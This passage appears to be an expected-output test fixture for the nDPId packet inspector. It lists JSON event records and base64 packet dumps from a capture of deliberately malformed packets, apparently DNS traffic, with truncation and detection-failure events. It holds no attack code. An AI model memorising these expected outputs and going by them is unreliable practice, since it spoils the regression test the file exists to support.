E66gKhT1JcM2kgWKvIXOPPjjmHF901em1sV2mJv"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":57,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":467,"global_ts_msec":1495451619545} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":57,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":467,"global_ts_msec":1495451619545}
00334{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":58,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+4gADgR3TuMWiHtzLpQ5QA16sALmpGgy8o="} 00320{"packet_event_id":1,"packet_event_name":"packet","packet_id":58,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+4gADgR3TuMWiHtzLpQ5QA16sALmpGgy8o="}
00246{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":58,"source":"badpackets.pcap","alias":"nDPId-test","size":44,"expected":60,"global_ts_msec":1495451620149} 00232{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":58,"source":"badpackets.pcap","alias":"nDPId-test","size":44,"expected":60,"global_ts_msec":1495451620149}
00334{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":58,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+4gADgR3TuMWiHtzLpQ5QA16sALmpGgy8o="} 00320{"packet_event_id":1,"packet_event_name":"packet","packet_id":58,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+4gADgR3TuMWiHtzLpQ5QA16sALmpGgy8o="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":58,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":10,"global_ts_msec":1495451620149} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":58,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":10,"global_ts_msec":1495451620149}
00335{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":59,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":43,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs\/AgADgR3TmMWiHtzLpQ5QA1Jh0F0T0AFA=="} 00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":59,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":43,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs\/AgADgR3TmMWiHtzLpQ5QA1Jh0F0T0AFA=="}
00246{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":59,"source":"badpackets.pcap","alias":"nDPId-test","size":43,"expected":60,"global_ts_msec":1495451620868} 00232{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":59,"source":"badpackets.pcap","alias":"nDPId-test","size":43,"expected":60,"global_ts_msec":1495451620868}
00335{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":59,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":43,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs\/AgADgR3TmMWiHtzLpQ5QA1Jh0F0T0AFA=="} 00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":59,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":43,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs\/AgADgR3TmMWiHtzLpQ5QA1Jh0F0T0AFA=="}
00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":59,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":9,"global_ts_msec":1495451620868} 00204{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":59,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":9,"global_ts_msec":1495451620868}
00472{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":60,"source":"badpackets.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":135,"global_ts_msec":1495451632004} 00472{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":60,"source":"badpackets.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":135,"global_ts_msec":1495451632004}
01133{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":60,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":636,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":636,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsh4gADYR8CWCDh0fzLpQ5QA1H4MIImMAvk+EEAABAAIABgAJBG5jYmkDbmxtA25paANnb3YAAAEAAcAMAAEAAQABUYAABIIOHW7ADAAuAAEAAVGAASQAAQcEAAFRgFoAvupZE3Dqzb4EbmNiaQNubG0DbmloA2dvdgAkf1HSoxN8AcwUdKY7WYciGx3geHak0EvSutU7odDo4dq+NlD8O\/xERFOOtnm1OnbmotJrAyzkKRKq2LhHEAKnpnQ\/7o4BV5VPHkuyi+TApDKVmXneUpTyPtHjKhT2CXt\/fyExp+B7ruJjC+Pcr5ZslqwQv1r1rPCkU5Mhz4yMR3BggA0Hh5V6YsPB3ZKTiKS\/eiA5iAmjeNxUPq28qT0hVjLTG5jO15eNmG2vPLSE3IUKr1s52HiMixNOjA9zTiA\/KJ+hR8CkVUQekEXmvwf9VBsUpBGDeS2mGNHxD+rzAlEWmLXNCGAh5Oui3uYYiuNNDR79YStEu6BCY8ZmkvsqwFAAAgABAAAOEAAMCWRuczEtbmNiacBQwFAAAgABAAAOEAAGA25zM8BZwFAAAgABAAAOEAAMCWRuczItbmNiacBQwFAAAgABAAAOEAAFAm5zwFnAUAACAAEAAA4QAAYDbnMywFnAUAAuAAEAAA4QASQAAgcEAAAOEFoAvupZE3Dqzb4EbmNiaQNubG0DbmloA2dvdgA+EebMkCne2CNH9\/msBB1ttxS45FhdXCD5iR18dVqPuT200zDdV4BFS01NU4MYeoc3XDyOxIWfU7WKy5Zs94YsWp3mz1cDLKuZG3MK\/hBxOol\/fcuIoTQU9\/sE"} 01119{"packet_event_id":1,"packet_event_name":"packet","packet_id":60,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":636,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":636,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsh4gADYR8CWCDh0fzLpQ5QA1H4MIImMAvk+EEAABAAIABgAJBG5jYmkDbmxtA25paANnb3YAAAEAAcAMAAEAAQABUYAABIIOHW7ADAAuAAEAAVGAASQAAQcEAAFRgFoAvupZE3Dqzb4EbmNiaQNubG0DbmloA2dvdgAkf1HSoxN8AcwUdKY7WYciGx3geHak0EvSutU7odDo4dq+NlD8O\/xERFOOtnm1OnbmotJrAyzkKRKq2LhHEAKnpnQ\/7o4BV5VPHkuyi+TApDKVmXneUpTyPtHjKhT2CXt\/fyExp+B7ruJjC+Pcr5ZslqwQv1r1rPCkU5Mhz4yMR3BggA0Hh5V6YsPB3ZKTiKS\/eiA5iAmjeNxUPq28qT0hVjLTG5jO15eNmG2vPLSE3IUKr1s52HiMixNOjA9zTiA\/KJ+hR8CkVUQekEXmvwf9VBsUpBGDeS2mGNHxD+rzAlEWmLXNCGAh5Oui3uYYiuNNDR79YStEu6BCY8ZmkvsqwFAAAgABAAAOEAAMCWRuczEtbmNiacBQwFAAAgABAAAOEAAGA25zM8BZwFAAAgABAAAOEAAMCWRuczItbmNiacBQwFAAAgABAAAOEAAFAm5zwFnAUAACAAEAAA4QAAYDbnMywFnAUAAuAAEAAA4QASQAAgcEAAAOEFoAvupZE3Dqzb4EbmNiaQNubG0DbmloA2dvdgA+EebMkCne2CNH9\/msBB1ttxS45FhdXCD5iR18dVqPuT200zDdV4BFS01NU4MYeoc3XDyOxIWfU7WKy5Zs94YsWp3mz1cDLKuZG3MK\/hBxOol\/fcuIoTQU9\/sE"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":60,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":602,"global_ts_msec":1495451632004} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":60,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":602,"global_ts_msec":1495451632004}
00635{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":61,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":265,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcg4sgAOcRN5mDTlH+zLpQ5QA179EGr6+UudOFkwABAAAADAABCk5PU1MyUFJPNTICYWQDZGxhA21pbAAAAQABwBoABgABAAACJAAtCGVhZ2xlaWIxwBcLcmFuZHkuc21pdGjAGneyKSsAACowAAAEOAAJOoAAAAOEwBoALgABAAACJACbAAYIAgAAA4RZL+jmWSKr1jYkA2RsYQNtaWwAQ+NjrNptV+b2\/CTqZKH2biSP27tkOWTGq2KCUhlOH9E41MLSOk2lCYL6smDX5fmm1zJuobp2dyrUo+9Imrd8bXDxUMgbvMl\/t\/ob2CKRj1UwIaYHEuWwqw=="} 00621{"packet_event_id":1,"packet_event_name":"packet","packet_id":61,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":265,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcg4sgAOcRN5mDTlH+zLpQ5QA179EGr6+UudOFkwABAAAADAABCk5PU1MyUFJPNTICYWQDZGxhA21pbAAAAQABwBoABgABAAACJAAtCGVhZ2xlaWIxwBcLcmFuZHkuc21pdGjAGneyKSsAACowAAAEOAAJOoAAAAOEwBoALgABAAACJACbAAYIAgAAA4RZL+jmWSKr1jYkA2RsYQNtaWwAQ+NjrNptV+b2\/CTqZKH2biSP27tkOWTGq2KCUhlOH9E41MLSOk2lCYL6smDX5fmm1zJuobp2dyrUo+9Imrd8bXDxUMgbvMl\/t\/ob2CKRj1UwIaYHEuWwqw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":61,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":231,"global_ts_msec":1495451636457} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":61,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":231,"global_ts_msec":1495451636457}
00646{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":62,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":275,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcRyUgAOcRc\/+DTlH+zLpQ5QA1lCQGuTGo9n2FkwABAAAADAABCk5PU1MyUFJPNTIEdXNlNgJhZANkbGEDbWlsAAABAAHAHwAGAAEAAAGdAC0IZWFnbGVpYjHAHAtyYW5keS5zbWl0aMAfd7IpKwAAKjAAAAQ4AAk6gAAAA4TAHwAuAAEAAAGdAJsABggCAAADhFkv6OZZIqvWNiQDZGxhA21pbABD42Os2m1X5vb8JOpkofZuJI\/bu2Q5ZMarYoJSGU4f0TjUwtI6TaUJgvqyYNfl+abXMm6hunZ3KtSj70iat3xtcPFQyBu8yX+3+hvYIpGPVTAhpgcS5bCrcsRzkWs="} 00632{"packet_event_id":1,"packet_event_name":"packet","packet_id":62,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":275,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcRyUgAOcRc\/+DTlH+zLpQ5QA1lCQGuTGo9n2FkwABAAAADAABCk5PU1MyUFJPNTIEdXNlNgJhZANkbGEDbWlsAAABAAHAHwAGAAEAAAGdAC0IZWFnbGVpYjHAHAtyYW5keS5zbWl0aMAfd7IpKwAAKjAAAAQ4AAk6gAAAA4TAHwAuAAEAAAGdAJsABggCAAADhFkv6OZZIqvWNiQDZGxhA21pbABD42Os2m1X5vb8JOpkofZuJI\/bu2Q5ZMarYoJSGU4f0TjUwtI6TaUJgvqyYNfl+abXMm6hunZ3KtSj70iat3xtcPFQyBu8yX+3+hvYIpGPVTAhpgcS5bCrcsRzkWs="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":62,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":241,"global_ts_msec":1495451636679} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":62,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":241,"global_ts_msec":1495451636679}
00646{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":63,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":274,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc1mwgAOcR5LeDTlH+zLpQ5QA1mK0GuOHsaJmFkwABAAAADAABCk5PU1MyUFJPNTIDZXRuA2RsYQNtaWwAAAEAAcAbAAYAAQAAAo4AMAhlYWdsZWliMQJhZMAbC3JhbmR5LnNtaXRowBt3sikrAAAqMAAABDgACTqAAAADhMAbAC4AAQAAAo4AmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORaw=="} 00632{"packet_event_id":1,"packet_event_name":"packet","packet_id":63,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":274,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc1mwgAOcR5LeDTlH+zLpQ5QA1mK0GuOHsaJmFkwABAAAADAABCk5PU1MyUFJPNTIDZXRuA2RsYQNtaWwAAAEAAcAbAAYAAQAAAo4AMAhlYWdsZWliMQJhZMAbC3JhbmR5LnNtaXRowBt3sikrAAAqMAAABDgACTqAAAADhMAbAC4AAQAAAo4AmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORaw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":63,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":240,"global_ts_msec":1495451636862} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":63,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":240,"global_ts_msec":1495451636862}
00975{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":64,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":520,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":520,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAV8MiEgADMR67bAa2aOzLpQ5QA1kJIHTuawQK+EEAABAAIABQAPBXByZXNzBmJhbXBmYQhiZXJrZWxleQNlZHUAAAEAAcAMAAEAAQAAKjAABEWjkf3ADAAuAAEAACowAKcAAQoEAAAqMFkmu3pZIXKW\/GIGYmFtcGZhCGJlcmtlbGV5A2VkdQDYr4iiKwGHUj8t5HsllLRdCw51+RuHgmXTVi3BKZp2SlHKwPPE5NDgykdlf2nh09MKoRsS4ZQ6K+HtO0Fgl3XDsVj0e38hlFZSyxT3UsVtxM+no9NBzelbSMqdsdKPMBXZBU6WN68SPUB0Mpo5EB0ERXosqZrbp40B7OEuBwhJTsBZAAIAAQAAKjAACQZhb2RuczLAYMBZAAIAAQAAKjAACAVhZG5zMsBgwFkAAgABAAAqMAAJBmFvZG5zMcBgwFkAAgABAAAqMAAIBWFkbnMxwGDAWQAuAAEAACowAKcAAgoDAAAqMFkn98ZZIq5X\/GIGYmFtcGZhCGJlcmtlbGV5A2VkdQAn0OdhYPVBP+po1b2zTtthnlvR+AwkjgERoFRV1d81BBycm1q7rnJTejDubWCC+fexo8tBaiAWuF7QlClYFOJSAmzwtfgGPOICDtid\/wne+kDmwXvgLbwXYX5lBPAt0LIXRb3dGGBe+RGHeQ=="} 00961{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":520,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":520,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAV8MiEgADMR67bAa2aOzLpQ5QA1kJIHTuawQK+EEAABAAIABQAPBXByZXNzBmJhbXBmYQhiZXJrZWxleQNlZHUAAAEAAcAMAAEAAQAAKjAABEWjkf3ADAAuAAEAACowAKcAAQoEAAAqMFkmu3pZIXKW\/GIGYmFtcGZhCGJlcmtlbGV5A2VkdQDYr4iiKwGHUj8t5HsllLRdCw51+RuHgmXTVi3BKZp2SlHKwPPE5NDgykdlf2nh09MKoRsS4ZQ6K+HtO0Fgl3XDsVj0e38hlFZSyxT3UsVtxM+no9NBzelbSMqdsdKPMBXZBU6WN68SPUB0Mpo5EB0ERXosqZrbp40B7OEuBwhJTsBZAAIAAQAAKjAACQZhb2RuczLAYMBZAAIAAQAAKjAACAVhZG5zMsBgwFkAAgABAAAqMAAJBmFvZG5zMcBgwFkAAgABAAAqMAAIBWFkbnMxwGDAWQAuAAEAACowAKcAAgoDAAAqMFkn98ZZIq5X\/GIGYmFtcGZhCGJlcmtlbGV5A2VkdQAn0OdhYPVBP+po1b2zTtthnlvR+AwkjgERoFRV1d81BBycm1q7rnJTejDubWCC+fexo8tBaiAWuF7QlClYFOJSAmzwtfgGPOICDtid\/wne+kDmwXvgLbwXYX5lBPAt0LIXRb3dGGBe+RGHeQ=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":64,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":486,"global_ts_msec":1495451661043} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":64,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":486,"global_ts_msec":1495451661043}
00641{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":65,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":272,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcdQIgAOcRRiKDTlH+zLpQ5QA12ScGtpz7Az2FkwABAAAADAABDG5jYjFzZHYwMDkwMQJhZANkbGEDbWlsAAABAAHAHAAGAAEAAAHJAC0IZWFnbGVpYjHAGQtyYW5keS5zbWl0aMAcd7IpKwAAKjAAAAQ4AAk6gAAAA4TAHAAuAAEAAAHJAJsABggCAAADhFkv6OZZIqvWNiQDZGxhA21pbABD42Os2m1X5vb8JOpkofZuJI\/bu2Q5ZMarYoJSGU4f0TjUwtI6TaUJgvqyYNfl+abXMm6hunZ3KtSj70iat3xtcPFQyBu8yX+3+hvYIpGPVTAhpgcS5bCrcsRzkWs="} 00627{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":272,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcdQIgAOcRRiKDTlH+zLpQ5QA12ScGtpz7Az2FkwABAAAADAABDG5jYjFzZHYwMDkwMQJhZANkbGEDbWlsAAABAAHAHAAGAAEAAAHJAC0IZWFnbGVpYjHAGQtyYW5keS5zbWl0aMAcd7IpKwAAKjAAAAQ4AAk6gAAAA4TAHAAuAAEAAAHJAJsABggCAAADhFkv6OZZIqvWNiQDZGxhA21pbABD42Os2m1X5vb8JOpkofZuJI\/bu2Q5ZMarYoJSGU4f0TjUwtI6TaUJgvqyYNfl+abXMm6hunZ3KtSj70iat3xtcPFQyBu8yX+3+hvYIpGPVTAhpgcS5bCrcsRzkWs="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":65,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":238,"global_ts_msec":1495451685924} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":65,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":238,"global_ts_msec":1495451685924}
00450{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":66,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":129,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcLFogADcR72\/BRGNjzLpQ5QA16EkGJwo+kYmEEAABAAUAAAABAmJnAAAwAAHADAAwAAEAAA4QAIgBAAMFAwEAAatvnBmra+7zeBm9l13suknlkqymM+dxrFdopER\/atXEXpeKon1lB9rWXtPTizfX"} 00436{"packet_event_id":1,"packet_event_name":"packet","packet_id":66,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":129,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcLFogADcR72\/BRGNjzLpQ5QA16EkGJwo+kYmEEAABAAUAAAABAmJnAAAwAAHADAAwAAEAAA4QAIgBAAMFAwEAAatvnBmra+7zeBm9l13suknlkqymM+dxrFdopER\/atXEXpeKon1lB9rWXtPTizfX"}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":66,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":95,"global_ts_msec":1495451704377} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":66,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":95,"global_ts_msec":1495451704377}
00673{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":67,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":295,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":295,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcf7QgAOQRIpPOJiMDzLpQ5QA1bBYGzcCiF4OFkwABAAAADAABBmlzYXRhcARkYWFzA2RsYQNtaWwAAAEAAcATAAYAAQAAADAAMAhlYWdsZWliMQJhZMAYC3JhbmR5LnNtaXRowBgBMZuVAAAAtAAAABIACTqAAAADhMATAC4AAQAAADAAoAAGCAMAAAC0WS8rbVkh7l0xhgRkYWFzA2RsYQNtaWwAX2YDHFGs++P6KY5jyOnyDe0uBmvRjeLNiVar29Ll1723S4vXnuSWhUWFZRQdEVXqxkbd6V+XrLkpWPckh1R4zgV9PWSNZ8HZUjMZhQWPWXpppn2CEeN7b88KhZ27nzVXi+\/73NKvN1wXzYqVmw0ROQ=="} 00659{"packet_event_id":1,"packet_event_name":"packet","packet_id":67,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":295,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":295,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcf7QgAOQRIpPOJiMDzLpQ5QA1bBYGzcCiF4OFkwABAAAADAABBmlzYXRhcARkYWFzA2RsYQNtaWwAAAEAAcATAAYAAQAAADAAMAhlYWdsZWliMQJhZMAYC3JhbmR5LnNtaXRowBgBMZuVAAAAtAAAABIACTqAAAADhMATAC4AAQAAADAAoAAGCAMAAAC0WS8rbVkh7l0xhgRkYWFzA2RsYQNtaWwAX2YDHFGs++P6KY5jyOnyDe0uBmvRjeLNiVar29Ll1723S4vXnuSWhUWFZRQdEVXqxkbd6V+XrLkpWPckh1R4zgV9PWSNZ8HZUjMZhQWPWXpppn2CEeN7b88KhZ27nzVXi+\/73NKvN1wXzYqVmw0ROQ=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":67,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":261,"global_ts_msec":1495451720070} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":67,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":261,"global_ts_msec":1495451720070}
01475{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":68,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":889,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":889,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcuAIgADYRFDWAx\/RyzLpQ5QA1xd4JH1hTgneEEAABAAIABgALCGNvbnRlbnQ0CG5vdm9wb3JuA2NvbQAAAQABwAwAAQABAAAOEAAExgc9H8AMAC4AAQAADhABIAABBwMAAA4QcNvYgFkGc0W0+Ahub3ZvcG9ybgNjb20AlewZozFU2n96aVRqxQUtXjawCyGgM6B0TzRF56i4jQojMtEEU5RHV2P7Vi\/giydID14A4YyUQ85+uCYlFI0DOCtWk0z5XmpprtC9X+\/T1\/r4JD0uPBpyimV4NZ7fwQxxt5\/3s2rlf4r73xWZZ+3IUuJ2vwbncpUyzu1TuFq+36Vdmu0LH4Wzte\/E0y2pkf37K2RBRQ7Nn\/d+Xj6t5ggL4KWxhT3Q0vSCylzZfyLrz2NK8Qb9WKZPaGXKWrHYVjLVERNJemNdvrQWUyPUJZC8YuSGBgJRiBu7nGJd9NUwi+LJQ8nOWu\/